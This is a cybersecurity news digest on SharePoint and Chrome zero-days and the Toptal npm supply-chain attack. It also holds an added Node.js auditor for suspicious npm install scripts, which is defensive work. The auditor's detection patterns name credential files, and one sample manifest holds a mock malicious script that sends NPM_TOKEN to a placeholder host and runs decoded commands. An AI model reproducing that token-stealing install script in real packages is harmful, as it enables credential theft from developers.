SparTech Software CyberPulse – Your quick strike cyber update for July 28, 2025 5:02 AM

Microsoft SharePoint Zero-Day Exploited: Cross-Industry Attacks and Escalating Ransomware Threats

In July 2025, newly discovered vulnerabilities in Microsoft SharePoint triggered a surge in targeted cyberattacks globally. Two distinct CVEs—one involving unauthenticated remote code execution and another allowing sophisticated network spoofing—were exploited by actors ranging from state-linked groups to ransomware operators. The campaign has compromised at least 75 organizations in finance, healthcare, government, and education, and the intrusions are growing more sophisticated as new webshell variants and ransomware payloads appear.

Vulnerability Overview and Attack Vectors

The vulnerabilities, assigned CVE-2025-49706 (network spoofing) and CVE-2025-49704 (remote code execution), present a significant threat due to their ability to bypass authentication and escalate privileges over the network. Attackers chain the spoofing and RCE flaws to gain full administrative access to SharePoint environments, allowing them to:

  • Directly interact with SharePoint file systems and databases
  • Alter internal application configurations remotely
  • Install persistent webshells, including .aspx, .exe, and .dll payloads
  • Deploy additional malware or ransomware, including the latest “Warlock” strain

Tactics, Techniques, and Procedures (TTPs)

Newly observed technical behaviors include:

  • Attackers use the “ToolShell” exploit chain, which combines unauthenticated code injection with access through spoofed sessions inside corporate networks.
  • Deployment of complex webshell backdoors and sideloaded .dll payloads, which evade traditional endpoint detection tools.
  • Post-compromise deployment of ransomware—Warlock variants have begun encrypting files directly on SharePoint servers.

Affected Sectors and Real-World Impact

Organizations in banking, healthcare, higher education, and government have confirmed breaches, some resulting in prolonged operational outages and data exposure. Cybersecurity agencies report that espionage-linked and financially motivated threat actors share techniques and tools in exploiting these zero-days. Notably, the China-linked Storm-2603 group has used the flaws for global cyber-espionage and command-and-control infrastructure deployment.

Microsoft has released immediate mitigation guidelines and patches, while the U.S. Cybersecurity and Infrastructure Security Agency (CISA) flags these CVEs as critical, urging rapid patch deployment and heightened monitoring.

Major GitHub Supply Chain Attack: Compromise of Toptal Account and NPM Packages

In mid-July 2025, software development platform Toptal suffered a serious supply chain attack when threat actors breached the organization’s GitHub account and began publishing malicious NPM packages. The attackers disguised their payloads as legitimate open-source libraries, built to hijack developer credentials and steal sensitive code through remote command execution. The incident has raised pressing industry-wide concerns about the security of code repositories and the vulnerability of the CI/CD pipeline ecosystem.

Technical Breakdown of the Attack

The attackers gained unauthorized access to the GitHub repository and pushed several NPM packages imitating trusted modules. Technical analysis indicates:

  • Malicious scripts exfiltrated credentials and API tokens from developer environments upon installation.
  • The packages included hidden modules capable of executing external commands, giving remote attackers a persistent foothold.
  • Code obfuscation and module side-loading techniques hindered detection by automated repository defense systems.
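An added example, not code from the article or from Toptal: a small Node.js audit that flags packages whose install-time lifecycle scripts show the behaviours listed above (credential harvesting, external command execution, network exfiltration, obfuscation). The package manifests and script contents are constructed samples, and the indicator patterns are assumptions about what such scripts tend to look like, not published signatures.

```javascript
// Added example (not from the article or Toptal): flag npm packages whose
// install-time lifecycle scripts show the traits described above.
const LIFECYCLE_HOOKS = ["preinstall", "install", "postinstall", "prepare"];

// Assumed indicator patterns (heuristics, not published signatures).
const INDICATORS = [
  { name: "env-harvest", re: /process\.env|\.npmrc|\.git-credentials/ },
  { name: "exec",        re: /child_process|\bexec(Sync)?\(|\bspawn(Sync)?\(/ },
  { name: "exfil",       re: /require\(["']https?["']\)|https?:\/\/|\bfetch\(/ },
  { name: "obfuscation", re: /Buffer\.from\([^)]*["']base64["']\)|\beval\(|\\x[0-9a-f]{2}\\x[0-9a-f]{2}/i },
];

// A manifest is a simplified package.json plus the bundled file contents:
// { name, version, scripts: {hook: cmd}, files: {path: sourceText} }.
function auditPackage(manifest) {
  const findings = new Set();
  const scripts = manifest.scripts || {};
  for (const hook of LIFECYCLE_HOOKS) {
    if (!(hook in scripts)) continue;
    findings.add("lifecycle:" + hook);
    const cmd = scripts[hook];
    // "node file.js": scan that file's source; otherwise scan the command line itself.
    const m = cmd.match(/\bnode\s+(\S+\.js)/);
    const body = (m && manifest.files && manifest.files[m[1]]) || cmd;
    for (const ind of INDICATORS) if (ind.re.test(body)) findings.add(ind.name);
  }
  return { name: manifest.name, version: manifest.version, findings: [...findings] };
}

// A lifecycle hook alone is common (native builds); report only packages that
// also show at least one behavioural indicator.
function riskyPackages(manifests) {
  return manifests.map(auditPackage)
    .filter(r => r.findings.some(f => !f.startsWith("lifecycle:")));
}

// Constructed sample manifests (not real packages).
const SAMPLE_MANIFESTS = [
  { name: "left-padd", version: "1.0.3", scripts: { postinstall: "node setup.js" },
    files: { "setup.js":
      'const cp = require("child_process"); const tok = process.env.NPM_TOKEN;' +
      'require("https").request({ host: "collector.example.invalid", method: "POST" }).end(tok);' +
      'cp.execSync(Buffer.from("ZWNobyBoaQ==", "base64").toString());' } },
  { name: "native-lib", version: "2.1.0", scripts: { test: "jest", postinstall: "node-gyp rebuild" }, files: {} },
  { name: "plain-lib", version: "0.4.0", scripts: { build: "tsc" }, files: {} },
];

console.log(JSON.stringify(riskyPackages(SAMPLE_MANIFESTS), null, 2));
```

Run against a real install by building the manifest list from each package.json under node_modules plus the files its lifecycle scripts reference; review flagged packages by hand rather than blocking on the heuristics alone.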

Remediation and Industry Implications

Toptal swiftly removed the compromised code and began a thorough audit of its code and access permissions. The breach has prompted industry discussion over:

  • The necessity for stringent multi-factor authentication and key control on code repositories
  • The importance of active monitoring and anomaly detection within CI/CD and software supply chains
  • New recommendations for automated scanning tools and manual review of third-party code included in production or public releases

Chrome’s V8 JavaScript Engine Zero-Day: Active Exploitation and Immediate Security Updates

Google responded to an active zero-day threat in Chrome’s V8 JavaScript engine (CVE-2025-6554) with the rapid release of a security fix. This vulnerability, exploited in the wild throughout early July, allowed adversaries to achieve remote code execution on victim systems merely by luring users to malicious webpages. The attack mechanism leverages a type confusion bug, exposing memory to arbitrary read/write operations and enabling browser sandbox escapes.

Technical Details and Exploit Mechanism

The flaw arises from improper handling of object types in Chrome’s V8 engine, permitting:

  • JavaScript code to access out-of-bounds memory within the browser process
  • The loading and execution of attacker-controlled scripts with elevated privileges
  • Exfiltration of browser data, credential theft, and triggering of system-level exploits given a suitable chained vulnerability

Google addressed the vulnerability by applying a targeted fix and dispatching emergency updates to all Chrome Stable channel users. Patches are also being released to other browsers built on Chromium, such as Edge and Brave, to mitigate the same exposure.
